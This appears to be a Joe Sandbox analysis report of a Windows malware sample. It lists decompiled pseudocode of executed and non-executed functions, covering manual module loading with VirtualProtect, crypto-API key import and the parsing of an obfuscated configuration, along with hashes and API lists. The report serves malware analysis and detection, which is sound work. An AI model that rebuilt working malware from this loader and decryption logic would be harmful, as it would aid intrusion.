                            • Instruction ID: 0ebdb453a4704ef71ccb0d6a953de6fe6c2922c0ed30c7076b6d9c9079742b34
                            • Opcode Fuzzy Hash: 5e406ea88fbe36327240fc74ccace8f3231dda3a7aab06252878a88bad6d2202
                            • Instruction Fuzzy Hash: 35311E71D00219FFDF11DE95C980AEDB7BABB56304F1041ABE905AB341E7709E858B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401875 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00401875(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x403180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45);
				_t18 = E00401B39( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401C1D(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E0040134F(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401E3D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E0040147E(_t42);
					L8:
					return _t29;
				}
			}














                            0x0040187d
                            0x0040187f
                            0x0040189b
                            0x004018ac
                            0x004018b3
                            0x00401911
                            0x00000000
                            0x004018b5
                            0x004018b5
                            0x004018bf
                            0x004018c3
                            0x004018c8
                            0x004018cb
                            0x004018d0
                            0x004018d4
                            0x004018d9
                            0x004018de
                            0x004018e2
                            0x004018e7
                            0x004018e8
                            0x004018ec
                            0x004018f1
                            0x004018f9
                            0x004018f9
                            0x004018f1
                            0x004018e2
                            0x004018d4
                            0x004018fb
                            0x00401904
                            0x00401908
                            0x00401912
                            0x00401918
                            0x00401918

                            APIs
                              • Part of subcall function 00401B39: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7
                              • Part of subcall function 0040134F: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387
                              • Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
                              • Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
                              • Part of subcall function 00401E3D: GetLastError.KERNEL32 ref: 00401EF1
                            • GetLastError.KERNEL32(?,?), ref: 004018F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 3135819546-0
                            • Opcode ID: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
                            • Instruction ID: 2a630c9bca26b312d1a6089272dc605b797118c6fb065e3c503f4e5450e97ac4
                            • Opcode Fuzzy Hash: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
                            • Instruction Fuzzy Hash: 50113B77600701ABD721BBA9CC80CAF77BCAF88304700413EEA42B7661EAB4ED058794
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D3A53 Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D3A53(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E006D78B3(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x6da2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E006D5BB5(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                            0x006d3a53
                            0x006d3a5b
                            0x006d3a72
                            0x006d3a8d
                            0x006d3a91
                            0x006d3a96
                            0x006d3a98
                            0x006d3aaa
                            0x006d3ab6
                            0x006d3a9a
                            0x006d3a9a
                            0x006d3a9f
                            0x006d3aa4
                            0x006d3aa4
                            0x006d3a98
                            0x006d3abc
                            0x006d3ac0
                            0x006d3ac0
                            0x006d3a67
                            0x006d3a6c
                            0x006d3a70
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                              • Part of subcall function 006D5BB5: SysFreeString.OLEAUT32(00000000), ref: 006D5C18
                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74D0F710,?,00000000,?,00000000,?,006D623B,?,004F0053,014A93D8,00000000,?), ref: 006D3AB6
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Free$HeapString
                            • String ID:
                            • API String ID: 3806048269-0
                            • Opcode ID: d245e0a0ee7c2381336d5e2ed517d2b5e9d945c79cb10e2679bd08dab57947dd
                            • Instruction ID: 0ca425a10939fdce6c5d91879d760c73300a1baf0808646512bd89d220d612e4
                            • Opcode Fuzzy Hash: d245e0a0ee7c2381336d5e2ed517d2b5e9d945c79cb10e2679bd08dab57947dd
                            • Instruction Fuzzy Hash: EF014F32901529BBCB229F94CC01FEA3B6AEF44750F09802AFE059E320D731DA60DBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D44D8 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E006D44D8(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E006D47E5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E006D7A71(_a8 + _a8);
					if(_t21 != 0) {
						E006D4456(_a4, _t21, _t23);
					}
					E006D789E(_a4);
				}
				return _t21;
			}





                            0x006d44e0
                            0x006d44e7
                            0x006d44e9
                            0x006d44f8
                            0x006d44ff
                            0x006d450e
                            0x006d4512
                            0x006d4519
                            0x006d4519
                            0x006d4521
                            0x006d4526
                            0x006d452b

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D44E9
                              • Part of subcall function 006D47E5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,006D44FD,00000001,006D3831,00000000), ref: 006D481D
                              • Part of subcall function 006D47E5: memcpy.NTDLL(006D44FD,006D3831,00000010,?,?,?,006D44FD,00000001,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740), ref: 006D4836
                              • Part of subcall function 006D47E5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 006D485F
                              • Part of subcall function 006D47E5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 006D4877
                              • Part of subcall function 006D47E5: memcpy.NTDLL(00000000,7491C740,014A9600,00000010), ref: 006D48C9
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                            • String ID:
                            • API String ID: 894908221-0
                            • Opcode ID: 483ddce791861ab0bcb43f674e8dd1beb633dbcfe4064a7cf0937d103d59c2d2
                            • Instruction ID: debfeb52e77f193027568ad149fcc8dd5609eac882fd5efc769330ef9deceec1
                            • Opcode Fuzzy Hash: 483ddce791861ab0bcb43f674e8dd1beb633dbcfe4064a7cf0937d103d59c2d2
                            • Instruction Fuzzy Hash: 28F03A36900109BBCF11AE65DC40DEA3BAFEF853A0B008027FD18CA211EA31DA559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D187F Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D187F(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E006D53C8(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E006D5B4A(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                            0x006d1887
                            0x006d18a1
                            0x00000000
                            0x006d18bd
                            0x006d1898
                            0x006d189f
                            0x00000000
                            0x00000000
                            0x006d18c4

                            APIs
                            • lstrlenW.KERNEL32(?,?,?,006D24FA,3D006D90,80000002,006D68B1,006D1629,74666F53,4D4C4B48,006D1629,?,3D006D90,80000002,006D68B1,?), ref: 006D18A4
                              • Part of subcall function 006D5B4A: SysAllocString.OLEAUT32(006D1629), ref: 006D5B63
                              • Part of subcall function 006D5B4A: SysFreeString.OLEAUT32(00000000), ref: 006D5BA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$AllocFreelstrlen
                            • String ID:
                            • API String ID: 3808004451-0
                            • Opcode ID: 4647e31a804ee6ee57b2d75f8a0f94d6b37e8ca57eacab935fc714d0fac69085
                            • Instruction ID: 184a86e58f80a56c908ce0558597b66191b4656a8c6c70f84e0acf9c0845dc04
                            • Opcode Fuzzy Hash: 4647e31a804ee6ee57b2d75f8a0f94d6b37e8ca57eacab935fc714d0fac69085
                            • Instruction Fuzzy Hash: F8F0283240020EBFDF169F90DC45EDA7F6BAB18355F048016FA1554171D772D971EBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D1EDF Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D1EDF(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E006D2554(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E006D789E(_a4);
				}
				return _t12;
			}





                            0x006d1eeb
                            0x006d1ef0
                            0x006d1ef4
                            0x006d1efb
                            0x006d1f06
                            0x006d1f0a
                            0x006d1f0a
                            0x006d1f13

                            APIs
                              • Part of subcall function 006D2554: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,006D654A,?), ref: 006D258A
                              • Part of subcall function 006D2554: memset.NTDLL ref: 006D25FF
                              • Part of subcall function 006D2554: memset.NTDLL ref: 006D2613
                            • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,006D654A,?,?,?,?), ref: 006D1EFB
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memcpymemset$FreeHeap
                            • String ID:
                            • API String ID: 3053036209-0
                            • Opcode ID: 354e82b3729c88b3849fff83588d67cae228243e3ce2c20625a123195fbfe569
                            • Instruction ID: c5f20f35bafb127bf0b020194f4e4a7c6cdca69491754580d323ce564b1a7ed0
                            • Opcode Fuzzy Hash: 354e82b3729c88b3849fff83588d67cae228243e3ce2c20625a123195fbfe569
                            • Instruction Fuzzy Hash: 71E0863380416977CB122A94DC41DEB7F5E8F51791F04402AFE0849305D731C61097E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 006D2792 Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E006D2792(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x6da344; // 0x69b25f44
				if(E006D1696( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x6da374 = _v8;
				}
				_t33 =  *0x6da344; // 0x69b25f44
				if(E006D1696( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x6da344; // 0x69b25f44
				_push(_t115);
				if(E006D1696( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x6da2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x6da344; // 0x69b25f44
						_t45 = E006D2A59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x6da2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x6da344; // 0x69b25f44
						_t46 = E006D2A59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x6da2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x6da344; // 0x69b25f44
						_t47 = E006D2A59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x6da2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x6da344; // 0x69b25f44
						_t48 = E006D2A59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x6da004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x6da344; // 0x69b25f44
						_t49 = E006D2A59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x6da02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x6da344; // 0x69b25f44
						_t50 = E006D2A59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x6da2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x6da344; // 0x69b25f44
								_t51 = E006D2A59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E006D18F5(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E006D731D();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x6da344; // 0x69b25f44
								_t52 = E006D2A59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E006D18F5(0, _t52) != 0) {
								_t121 =  *0x6da3cc; // 0x14a9600
								E006D3D80(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x6da344; // 0x69b25f44
								_t53 = E006D2A59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x6da348; // 0xdcd5a8
								_t22 = _t54 + 0x6db252; // 0x616d692f
								 *0x6da370 = _t22;
								goto L60;
							} else {
								_t64 = E006D18F5(0, _t53);
								 *0x6da370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x6da344; // 0x69b25f44
										_t56 = E006D2A59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x6da348; // 0xdcd5a8
										_t23 = _t57 + 0x6db79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E006D18F5(0, _t56);
									}
									 *0x6da3e0 = _t58;
									HeapFree( *0x6da2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                            0x006d2792
                            0x006d2792
                            0x006d2792
                            0x006d2792
                            0x006d2795
                            0x006d27b2
                            0x006d27c0
                            0x006d27c0
                            0x006d27c5
                            0x006d27df
                            0x006d2a4d
                            0x006d2a54
                            0x006d2a58
                            0x006d2a58
                            0x006d27e5
                            0x006d27ea
                            0x006d2802
                            0x006d2a3a
                            0x006d2a44
                            0x00000000
                            0x006d2808
                            0x006d2808
                            0x006d2809
                            0x006d280e
                            0x006d2824
                            0x006d2810
                            0x006d2810
                            0x006d281d
                            0x006d281d
                            0x006d2826
                            0x006d282f
                            0x006d2831
                            0x006d283b
                            0x006d2840
                            0x006d2840
                            0x006d283b
                            0x006d2847
                            0x006d285d
                            0x006d2849
                            0x006d2849
                            0x006d2856
                            0x006d2856
                            0x006d2861
                            0x006d2863
                            0x006d286d
                            0x006d2872
                            0x006d2872
                            0x006d286d
                            0x006d2879
                            0x006d288f
                            0x006d287b
                            0x006d287b
                            0x006d2888
                            0x006d2888
                            0x006d2893
                            0x006d2895
                            0x006d289f
                            0x006d28a4
                            0x006d28a4
                            0x006d289f
                            0x006d28ab
                            0x006d28c1
                            0x006d28ad
                            0x006d28ad
                            0x006d28ba
                            0x006d28ba
                            0x006d28c5
                            0x006d28c7
                            0x006d28d1
                            0x006d28d6
                            0x006d28d6
                            0x006d28d1
                            0x006d28dd
                            0x006d28f3
                            0x006d28df
                            0x006d28df
                            0x006d28ec
                            0x006d28ec
                            0x006d28f7
                            0x006d28f9
                            0x006d2903
                            0x006d2908
                            0x006d2908
                            0x006d2903
                            0x006d290f
                            0x006d2925
                            0x006d2911
                            0x006d2911
                            0x006d291e
                            0x006d291e
                            0x006d2929
                            0x006d293c
                            0x006d293c
                            0x00000000
                            0x006d292b
                            0x006d292b
                            0x006d2935
                            0x00000000
                            0x006d2946
                            0x006d2946
                            0x006d2948
                            0x006d295e
                            0x006d294a
                            0x006d294a
                            0x006d2957
                            0x006d2957
                            0x006d2962
                            0x006d2964
                            0x006d2967
                            0x006d2968
                            0x006d296f
                            0x006d2971
                            0x006d2972
                            0x006d2972
                            0x006d296f
                            0x006d2979
                            0x006d298f
                            0x006d297b
                            0x006d297b
                            0x006d2988
                            0x006d2988
                            0x006d2993
                            0x006d29a1
                            0x006d29ab
                            0x006d29ab
                            0x006d29b3
                            0x006d29c9
                            0x006d29b5
                            0x006d29b5
                            0x006d29c2
                            0x006d29c2
                            0x006d29cd
                            0x006d29e0
                            0x006d29e0
                            0x006d29e5
                            0x006d29eb
                            0x00000000
                            0x006d29cf
                            0x006d29d2
                            0x006d29d7
                            0x006d29de
                            0x006d29f0
                            0x006d29f2
                            0x006d2a08
                            0x006d29f4
                            0x006d29f4
                            0x006d2a01
                            0x006d2a01
                            0x006d2a0c
                            0x006d2a18
                            0x006d2a1d
                            0x006d2a1d
                            0x006d2a0e
                            0x006d2a11
                            0x006d2a11
                            0x006d2a2b
                            0x006d2a30
                            0x006d2a36
                            0x00000000
                            0x006d2a39
                            0x00000000
                            0x006d29de
                            0x006d29cd
                            0x006d2935
                            0x006d2929

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D2837
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D2869
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D289B
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D28CD
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D28FF
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D2931
                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 006D2A30
                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 006D2A44
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 843cadaf1ccce869031acc0d94b8a004d671fcb7b14df2e1351e1fe190c4a1dc
                            • Instruction ID: dbaa9717866c2decb1b925def044651d69ca2db2c404e1acde17e0eb7ae7d38c
                            • Opcode Fuzzy Hash: 843cadaf1ccce869031acc0d94b8a004d671fcb7b14df2e1351e1fe190c4a1dc
                            • Instruction Fuzzy Hash: 1A81D370E04206EBCB20DBF5CDA4DAB77BBAB6C700B28192BA001DB314E675DD459B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004012B0 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004012B0() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x403170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40317c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40316c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x403168 = _t5;
						 *0x403170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x403164 = _t6;
						if(_t6 == 0) {
							 *0x403164 =  *0x403164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                            0x004012b1
                            0x004012bf
                            0x004012c5
                            0x004012cc
                            0x00401323
                            0x00401323
                            0x004012ce
                            0x004012d6
                            0x004012e3
                            0x004012e3
                            0x0040131f
                            0x00401321
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004012d8
                            0x004012df
                            0x004012e5
                            0x004012e5
                            0x004012ea
                            0x004012f8
                            0x004012fd
                            0x00401303
                            0x00401309
                            0x00401310
                            0x00401312
                            0x00401312
                            0x0040131c
                            0x004012e1
                            0x004012e1
                            0x00000000
                            0x004012e1
                            0x004012df

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
                            • GetVersion.KERNEL32 ref: 004012CE
                            • GetCurrentProcessId.KERNEL32 ref: 004012EA
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
